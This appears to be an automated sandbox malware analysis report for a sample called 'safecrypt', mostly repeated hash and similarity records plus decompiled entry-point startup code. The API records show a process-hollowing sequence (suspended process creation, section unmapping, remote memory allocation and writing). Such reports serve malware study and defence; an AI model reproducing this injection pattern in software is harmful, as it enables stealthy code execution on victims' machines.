                    • Instruction Fuzzy Hash: BAB17B32A18616EEEB1EB7608C11F3D79AABB43B05F0457DDE10F9A181FE784A03C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 0-2896586159
                    • Opcode ID: 53ea77fb2fd8ceae4feccdad31961cf4784dca35f23adbf7ec4a2bc6ea0005e0
                    • Instruction ID: fdc9e696c0a6a677f1452fcfdf071dc48ffb0839ce69de4286552bf18afce774
                    • Opcode Fuzzy Hash: 53ea77fb2fd8ceae4feccdad31961cf4784dca35f23adbf7ec4a2bc6ea0005e0
                    • Instruction Fuzzy Hash: B6B19C32A18606EEEB1EB7618C11F3D79AABB43B05F0457DDE10F9A181FE784603C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 963392458-2896586159
                    • Opcode ID: 23fb8784c81a0c4d8619528a71653a8ad43e51c2ef58418232b7044396607454
                    • Instruction ID: ed549ae6cea27e66b5515cb24159d0fc7fb2d78a29b27dc2addf4f09ac8307a5
                    • Opcode Fuzzy Hash: 23fb8784c81a0c4d8619528a71653a8ad43e51c2ef58418232b7044396607454
                    • Instruction Fuzzy Hash: 95B17B32A18616EEEB1EB7608C11F3D79AABB43B05F0457DDA10F9A181FE784A03C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 963392458-2896586159
                    • Opcode ID: 8565c878a3deed42d47c02356dec811ee2fc4eb26b09eb4fadbda93de0f2137b
                    • Instruction ID: 8dfd374734ad6c8459eb0e7caa03d06618144a8bd7d1a9785996b754735404e5
                    • Opcode Fuzzy Hash: 8565c878a3deed42d47c02356dec811ee2fc4eb26b09eb4fadbda93de0f2137b
                    • Instruction Fuzzy Hash: 11A17B32A18616EEEB1EB7608C11F3D79AABB43B05F0457DDE10F9A181FE784A03C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 963392458-2896586159
                    • Opcode ID: 7b87c3db8dc362504aba36e795895d3c41696d111f8d173b4f00d75f98f0832a
                    • Instruction ID: febe6903414a26297856fe5fcb7acb58798629cb643a03ab818b5a4b383f499d
                    • Opcode Fuzzy Hash: 7b87c3db8dc362504aba36e795895d3c41696d111f8d173b4f00d75f98f0832a
                    • Instruction Fuzzy Hash: DFA17A32A18615EEEB1EB7608C11F3D79AABB43B05F0457DDE10F9A181FE784A03C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID: D$VirtualAllocEx$e
                    • API String ID: 963392458-2896586159
                    • Opcode ID: ca629caef0a835ae26e1444fee6d0834b4fb3b0edd8e052a36b4de6badd2e181
                    • Instruction ID: 79e30d9590d04bbf8c0e46c23ac1befdecffdc2f64a6f8dd7be550542e366fb8
                    • Opcode Fuzzy Hash: ca629caef0a835ae26e1444fee6d0834b4fb3b0edd8e052a36b4de6badd2e181
                    • Instruction Fuzzy Hash: A8A18B32A18615EEEB1EB7608C01F3D7AAABB43B05F0457DDE10F9A181FE784A03C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID: VirtualAllocEx$e
                    • API String ID: 963392458-3414709220
                    • Opcode ID: f1d57a2e5f4bb6830363ef58f08661e8d702e7259bd3d167468fe82860ee8c7e
                    • Instruction ID: 3bddfd5c1d720f63f8b087ab9da2079ff57b3af26d15d61eee3c0c8dede80479
                    • Opcode Fuzzy Hash: f1d57a2e5f4bb6830363ef58f08661e8d702e7259bd3d167468fe82860ee8c7e
                    • Instruction Fuzzy Hash: 1DA18B32A18606EEEB1EB7608C11F3D79AABB43B05F0457DDE10F9A191FE784503C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID: VirtualAllocEx$e
                    • API String ID: 963392458-3414709220
                    • Opcode ID: 58d1255eae8a6caefc0357cf6fb63d633457d868c0c8260190ca25ce653851f6
                    • Instruction ID: a152272861e08c7bb96cd7ca636fb3074919a3490af63c9923599367a48e88e2
                    • Opcode Fuzzy Hash: 58d1255eae8a6caefc0357cf6fb63d633457d868c0c8260190ca25ce653851f6
                    • Instruction Fuzzy Hash: 4C917B32A18606EEEB1E77608C11F3D79AABB43B05F0457DDE10F9A192FE784903C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 02681B9A
                    • NtUnmapViewOfSection.NTDLL ref: 02681C71
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateProcessSectionUnmapView
                    • String ID: VirtualAllocEx$e
                    • API String ID: 1619107759-3414709220
                    • Opcode ID: 31d1828d9d4f200600dc959b7ebd04a41f107eab7859b46539bacdfb2f9280a0
                    • Instruction ID: b563ec1e611ab1069b9b55c639b675b40aa9f6b7eb557dfc9ca2039540cc4841
                    • Opcode Fuzzy Hash: 31d1828d9d4f200600dc959b7ebd04a41f107eab7859b46539bacdfb2f9280a0
                    • Instruction Fuzzy Hash: 3F918B32918506EEEF1E77608C11E3D7AAABB83B05F049BDDE10F9A191FE784903C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 02681B9A
                    • NtUnmapViewOfSection.NTDLL ref: 02681C71
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateProcessSectionUnmapView
                    • String ID: VirtualAllocEx$e
                    • API String ID: 1619107759-3414709220
                    • Opcode ID: 02a07799b9b6ae327e3d3264c6d3c62e1538a7645c54fa041112aa72164dd6d1
                    • Instruction ID: 1c240a507b30fdb46f294fc6288ec66323c6d19d967a45bb5cddba087df25eb7
                    • Opcode Fuzzy Hash: 02a07799b9b6ae327e3d3264c6d3c62e1538a7645c54fa041112aa72164dd6d1
                    • Instruction Fuzzy Hash: A2817C32918515EEEF1E77608C11E3D79AABB43B05F0497DCE10F9A191FE784903C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 02681B9A
                    • NtUnmapViewOfSection.NTDLL ref: 02681C71
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: CreateProcessSectionUnmapView
                    • String ID: VirtualAllocEx$e
                    • API String ID: 1619107759-3414709220
                    • Opcode ID: 52778197a532161633e098df0325a76d3a3389b1dd9d2aa0d1ef766b4031aefb
                    • Instruction ID: 11dba5b2e97e460d241d66f07bbc53d765c31fec2a048421d1a2000e4517f89f
                    • Opcode Fuzzy Hash: 52778197a532161633e098df0325a76d3a3389b1dd9d2aa0d1ef766b4031aefb
                    • Instruction Fuzzy Hash: 8C818C32918506EEEF1EB7618C11E3D7AAABB83705F0457DCE10B9A191FE784903C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 02681B9A
                    • NtUnmapViewOfSection.NTDLL ref: 02681C71
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 02681D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocCreateProcessSectionUnmapViewVirtual
                    • String ID: VirtualAllocEx$e
                    • API String ID: 2181670624-3414709220
                    • Opcode ID: 6fc698ad73ede1d33af53bfef04ffcc6a4ef853f0292bd4d88eaf2d3f9a98a61
                    • Instruction ID: 1778a423f7857959ca02e62539f645c677247a4d4baba2500b91ed7781e86003
                    • Opcode Fuzzy Hash: 6fc698ad73ede1d33af53bfef04ffcc6a4ef853f0292bd4d88eaf2d3f9a98a61
                    • Instruction Fuzzy Hash: B281AC32918505EEEF1EB7608C11E3D7AAABF83B05F0457DDE10B9A182FE784A03C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 02681B9A
                    • NtUnmapViewOfSection.NTDLL ref: 02681C71
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 02681D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocCreateProcessSectionUnmapViewVirtual
                    • String ID: VirtualAllocEx$e
                    • API String ID: 2181670624-3414709220
                    • Opcode ID: 6faa3546c9fd00073e5a457d6f28b102ba98c7acca79cc76271f017ee15965bf
                    • Instruction ID: 0213decefcdc237162a1041f1d762449cbed3ca641133d4b70e68ed3330f8e72
                    • Opcode Fuzzy Hash: 6faa3546c9fd00073e5a457d6f28b102ba98c7acca79cc76271f017ee15965bf
                    • Instruction Fuzzy Hash: 8A71BC32918605EEEF1EB7608C01F3D7AAABB43B05F0457DCE10B9A192FE784903C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 02681B9A
                    • NtUnmapViewOfSection.NTDLL ref: 02681C71
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 02681D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocCreateProcessSectionUnmapViewVirtual
                    • String ID: VirtualAllocEx$e
                    • API String ID: 2181670624-3414709220
                    • Opcode ID: 3ad994d27de5206e7c8a6355cba1e8e1cb9d50b88e8de6fe583e2850bcc5eb5d
                    • Instruction ID: 393d71a4b1fce0e78f99b7b12d144b786f29744b4bd1b11d361c9cf586ba8367
                    • Opcode Fuzzy Hash: 3ad994d27de5206e7c8a6355cba1e8e1cb9d50b88e8de6fe583e2850bcc5eb5d
                    • Instruction Fuzzy Hash: 6C719C32918605EEEF1EB7608C11F3D7AAABB43705F0457DDE10B9A192EE784903CA55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtUnmapViewOfSection.NTDLL ref: 02681C71
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 02681D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocSectionUnmapViewVirtual
                    • String ID: VirtualAllocEx
                    • API String ID: 3336438485-3861807693
                    • Opcode ID: af9ac0b87de969eadb4c408595c800d3ac696967ce67c7bf93f4a9e7a4054187
                    • Instruction ID: 975b750c4d9cabbf2c61ab0e40a5b1e88f60261dff8be248b5e6ba879bf58442
                    • Opcode Fuzzy Hash: af9ac0b87de969eadb4c408595c800d3ac696967ce67c7bf93f4a9e7a4054187
                    • Instruction Fuzzy Hash: A0516936A18502EEFF1E77608C11E3D399ABB83B05F049BDCE10B96182FE784A03D955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtUnmapViewOfSection.NTDLL ref: 02681C71
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 02681D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocSectionUnmapViewVirtual
                    • String ID: VirtualAllocEx
                    • API String ID: 3336438485-3861807693
                    • Opcode ID: 568a242ed199f376b7d6f9cbc8b1507a3290ca4932e641ff519afa140fa44415
                    • Instruction ID: 80f00767718c885235030ef01064a6d5b854186a606f4d7b09743fde67c47b24
                    • Opcode Fuzzy Hash: 568a242ed199f376b7d6f9cbc8b1507a3290ca4932e641ff519afa140fa44415
                    • Instruction Fuzzy Hash: 68517936A18502EEFF1E77618C11E3D7A9ABB83B05F049BDCE10B99182FE784603D955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtUnmapViewOfSection.NTDLL ref: 02681C71
                      • Part of subcall function 02681CB0: VirtualAllocEx.KERNELBASE(?,?), ref: 02681D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocSectionUnmapViewVirtual
                    • String ID: VirtualAllocEx
                    • API String ID: 3336438485-3861807693
                    • Opcode ID: 7898c4c87012bef95323b5df6b49c50ae41beeaaa732c7ee309b8c548582080b
                    • Instruction ID: b6cd7e36b77679fee4cc9028b63d0d64916c5a4ac55cc77868460a043f277fe0
                    • Opcode Fuzzy Hash: 7898c4c87012bef95323b5df6b49c50ae41beeaaa732c7ee309b8c548582080b
                    • Instruction Fuzzy Hash: 48515936A18512EEFF1E77608C11F3D799ABB83B05F0497DDE10B99182EE784A03C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtUnmapViewOfSection.NTDLL ref: 02681C71
                      • Part of subcall function 02681CB0: VirtualAllocEx.KERNELBASE(?,?), ref: 02681D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocSectionUnmapViewVirtual
                    • String ID: VirtualAllocEx
                    • API String ID: 3336438485-3861807693
                    • Opcode ID: b369795b6b3b4aad0a1a6a5f6562f5c1c15e44ebac51d73e2272b5ab69c00b1d
                    • Instruction ID: 68009a83ed56bb190fd30db41d86b58100a58b1f54be6c1a692ec8db02016a93
                    • Opcode Fuzzy Hash: b369795b6b3b4aad0a1a6a5f6562f5c1c15e44ebac51d73e2272b5ab69c00b1d
                    • Instruction Fuzzy Hash: EE518A36918512EEEF1E77608C11F3D79AABB83B05F0457DDE10B961C2EE784603C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • NtUnmapViewOfSection.NTDLL ref: 02681C71
                      • Part of subcall function 02681CB0: VirtualAllocEx.KERNELBASE(?,?), ref: 02681D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocSectionUnmapViewVirtual
                    • String ID: VirtualAllocEx
                    • API String ID: 3336438485-3861807693
                    • Opcode ID: a629abad902a7b65e16c71844c4cce067917ef760d73d4f94390d060d10b591f
                    • Instruction ID: 6febc1418466294d9f567f5df2b2ac71021b58082149b586c64be8ece3ff2d41
                    • Opcode Fuzzy Hash: a629abad902a7b65e16c71844c4cce067917ef760d73d4f94390d060d10b591f
                    • Instruction Fuzzy Hash: 2E516A36918612EEEF1E77608C11F3D79AABB83B05F0457DDE00B96192EE784A03C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 02681D2F
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02681DFF
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocMemoryProcessVirtualWrite
                    • String ID:
                    • API String ID: 645232735-0
                    • Opcode ID: a3f1874cad9720e790f306d334e0fea3cbc48968f35a2c28eb104fcec57d9bb2
                    • Instruction ID: 85e87920c368f69d3a0a91cfc2f5b93d878e3b1061592e26286fb4582775868d
                    • Opcode Fuzzy Hash: a3f1874cad9720e790f306d334e0fea3cbc48968f35a2c28eb104fcec57d9bb2
                    • Instruction Fuzzy Hash: F4412736518512EEEF1E73608C11F3D759ABB83B05F449BDDE00B99182EEB84603C956
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 02681D2F
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02681DFF
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocMemoryProcessVirtualWrite
                    • String ID:
                    • API String ID: 645232735-0
                    • Opcode ID: 3342f43370aa44f67f4078b01202c6b2d78177dbd371649fe64e271375d627ac
                    • Instruction ID: 37e1df3ec3eb1e572c59e8854095cb13f30abfba968c744b7292236c99648f41
                    • Opcode Fuzzy Hash: 3342f43370aa44f67f4078b01202c6b2d78177dbd371649fe64e271375d627ac
                    • Instruction Fuzzy Hash: 9A413436928512EEFF1E73618C15F3E759ABB83B05F049BDDE00B99182FEA90603C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 02681D2F
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02681DFF
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocMemoryProcessVirtualWrite
                    • String ID:
                    • API String ID: 645232735-0
                    • Opcode ID: 8e9852d15e4511fca0b19a9af5f756f5d2b73f2fba728dfd1361f970931d5a43
                    • Instruction ID: ba90eadfac0c083118d387847274e922947dfb5628a2b6a0f40ebc1a6a039b30
                    • Opcode Fuzzy Hash: 8e9852d15e4511fca0b19a9af5f756f5d2b73f2fba728dfd1361f970931d5a43
                    • Instruction Fuzzy Hash: F1413836918512EEFB1F73618C15F3E799ABB83B05F049BDCA00BD5182FEA54603C966
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 02681D2F
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02681DFF
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocMemoryProcessVirtualWrite
                    • String ID:
                    • API String ID: 645232735-0
                    • Opcode ID: b7d3ed824fc410e548ae39d9472c26443d1d8b5b60dd02e76ff90d4b25fedc1b
                    • Instruction ID: d0deb1ec4003a1a2b33057340b02a13a04054a33fe9b81aab83b8bed01a4d377
                    • Opcode Fuzzy Hash: b7d3ed824fc410e548ae39d9472c26443d1d8b5b60dd02e76ff90d4b25fedc1b
                    • Instruction Fuzzy Hash: AE413736918512AEFF1E73608C15F3E759ABB83B05F049BDDE00B99182FEB44603C966
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 02681D2F
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02681DFF
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocMemoryProcessVirtualWrite
                    • String ID:
                    • API String ID: 645232735-0
                    • Opcode ID: ad653cdbbe202b6903ff7537959809c2433e5f10a0ccc8f705f12dba73efa9c5
                    • Instruction ID: b61cad75434aa59bb9690e461d233b70d82495cfa1cb2ab55e8d00939afeea7f
                    • Opcode Fuzzy Hash: ad653cdbbe202b6903ff7537959809c2433e5f10a0ccc8f705f12dba73efa9c5
                    • Instruction Fuzzy Hash: 57413432918512AEEF1E77608C15F3D75AABB83B05F449BDDE00B9A0C2FEA44603C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAllocEx.KERNELBASE(?,?), ref: 02681D2F
                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02681DFF
                    Memory Dump Source
                    • Source File: 00000000.00000002.326175855.0000000002680000.00000040.00000001.sdmp, Offset: 02680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_2680000_safecrypt.jbxd
                    Similarity
                    • API ID: AllocMemoryProcessVirtualWrite
                    • String ID:
                    • API String ID: 645232735-0
                    • Opcode ID: 1b53f0610925ea3729fd391b07247f995db752541dc19181e2343a024497bfdc
                    • Instruction ID: fda078f4fbb5a9a7e7c393eb79a9ebc4a5e6183b9c4f59b88aeb7fed04dabba9
                    • Opcode Fuzzy Hash: 1b53f0610925ea3729fd391b07247f995db752541dc19181e2343a024497bfdc
                    • Instruction Fuzzy Hash: 2A312536918512AEEF1E77608C15F3D75AABB83B05F049BDDE00B95182FEB44603C955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 71%
                    			_entry_(void* __ebx, void* __edi, void* __esi) {
                    				CHAR* _v8;
                    				intOrPtr* _v24;
                    				intOrPtr _v28;
                    				struct _STARTUPINFOA _v96;
                    				int _v100;
                    				char** _v104;
                    				long _v108;
                    				void _v112;
                    				char** _v116;
                    				intOrPtr* _v120;
                    				intOrPtr _v124;
                    				void* _t27;
                    				intOrPtr _t36;
                    				signed int _t38;
                    				long _t40;
                    				intOrPtr* _t41;
                    				intOrPtr _t42;
                    				intOrPtr _t49;
                    				intOrPtr* _t55;
                    				intOrPtr _t58;
                    				intOrPtr _t61;
                    
                    				_push(0xffffffff);
                    				_push(0x470e58);
                    				_push(0x441bcc);
                    				_push( *[fs:0x0]);
                    				 *[fs:0x0] = _t58;
                    				_v28 = _t58 - 0x68;
                    				_v8 = 0;
                    				__set_app_type(2);
                    				 *0x86efbc =  *0x86efbc | 0xffffffff;
                    				 *0x86efc0 =  *0x86efc0 | 0xffffffff;
                    				 *(__p__fmode()) =  *0x86efa8;
                    				 *(__p__commode()) =  *0x86efa4;
                    				 *0x86efb8 = _adjust_fdiv;
                    				_t27 = E00441BCB( *_adjust_fdiv);
                    				_t61 =  *0x475eb0; // 0x1
                    				if(_t61 == 0) {
                    					__setusermatherr(E00441BC8);
                    				}
                    				E00441BB6(_t27);
                    				_push(0x474014);
                    				_push(0x474010);
                    				L00441BB0();
                    				_v112 =  *0x86efa0;
                    				__getmainargs( &_v100,  &_v116,  &_v104,  *0x86ef9c,  &_v112);
                    				_push(0x47400c);
                    				_push(0x474000); // executed
                    				L00441BB0(); // executed
                    				_t55 =  *_acmdln;
                    				_v120 = _t55;
                    				if( *_t55 != 0x22) {
                    					while( *_t55 > 0x20) {
                    						_t55 = _t55 + 1;
                    						_v120 = _t55;
                    					}
                    				} else {
                    					do {
                    						_t55 = _t55 + 1;
                    						_v120 = _t55;
                    						_t42 =  *_t55;
                    					} while (_t42 != 0 && _t42 != 0x22);
                    					if( *_t55 == 0x22) {
                    						L6:
                    						_t55 = _t55 + 1;
                    						_v120 = _t55;
                    					}
                    				}
                    				_t36 =  *_t55;
                    				if(_t36 != 0 && _t36 <= 0x20) {
                    					goto L6;
                    				}
                    				_v96.dwFlags = 0;
                    				GetStartupInfoA( &_v96);
                    				if((_v96.dwFlags & 0x00000001) == 0) {
                    					_t38 = 0xa;
                    				} else {
                    					_t38 = _v96.wShowWindow & 0x0000ffff;
                    				}
                    				_t40 = E00441E24(GetModuleHandleA(0), _t39, 0, _t55, _t38);
                    				_v108 = _t40;
                    				ldiv(_t40, ??);
                    				_t41 = _v24;
                    				_t49 =  *((intOrPtr*)( *_t41));
                    				_v124 = _t49;
                    				_push(_t41);
                    				_push(_t49);
                    				L00441BAA();
                    				return _t41;
                    			}
























                    0x00441a49
                    0x00441a4b
                    0x00441a50
                    0x00441a5b
                    0x00441a5c
                    0x00441a69
                    0x00441a6e
                    0x00441a73
                    0x00441a7a
                    0x00441a81
                    0x00441a94
                    0x00441aa2
                    0x00441aab
                    0x00441ab0
                    0x00441ab5
                    0x00441abb
                    0x00441ac2
                    0x00441ac8
                    0x00441ac9
                    0x00441ace
                    0x00441ad3
                    0x00441ad8
                    0x00441ae2
                    0x00441afb
                    0x00441b01
                    0x00441b06
                    0x00441b0b
                    0x00441b18
                    0x00441b1a
                    0x00441b20
                    0x00441b5c
                    0x00441b61
                    0x00441b62
                    0x00441b62
                    0x00441b22
                    0x00441b22
                    0x00441b22
                    0x00441b23
                    0x00441b26
                    0x00441b28
                    0x00441b33
                    0x00441b35
                    0x00441b35
                    0x00441b36
                    0x00441b36
                    0x00441b33
                    0x00441b39
                    0x00441b3d
                    0x00000000
                    0x00000000
                    0x00441b43
                    0x00441b4a
                    0x00441b54
                    0x00441b69
                    0x00441b56
                    0x00441b56
                    0x00441b56
                    0x00441b75
                    0x00441b7a
                    0x00441b7e
                    0x00441b84
                    0x00441b89
                    0x00441b8b
                    0x00441b8e
                    0x00441b8f
                    0x00441b90
                    0x00441b97

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.325756086.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.325749384.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.325794672.0000000000442000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.325826185.0000000000474000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.325834815.0000000000475000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.325862733.000000000086F000.00000002.00020000.sdmp Download File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_safecrypt.jbxd
                    Similarity
                    • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrldiv
                    • String ID:
                    • API String ID: 2844061703-0
                    • Opcode ID: 38d39d22723e807a926b48ef2cdf7980a43b7f3ca95e95afe9c05e5f157759b6
                    • Instruction ID: d391ae85305779653b6cf4a2ccaf8ff45d307429c3a7211341ba76037e11effb
                    • Opcode Fuzzy Hash: 38d39d22723e807a926b48ef2cdf7980a43b7f3ca95e95afe9c05e5f157759b6
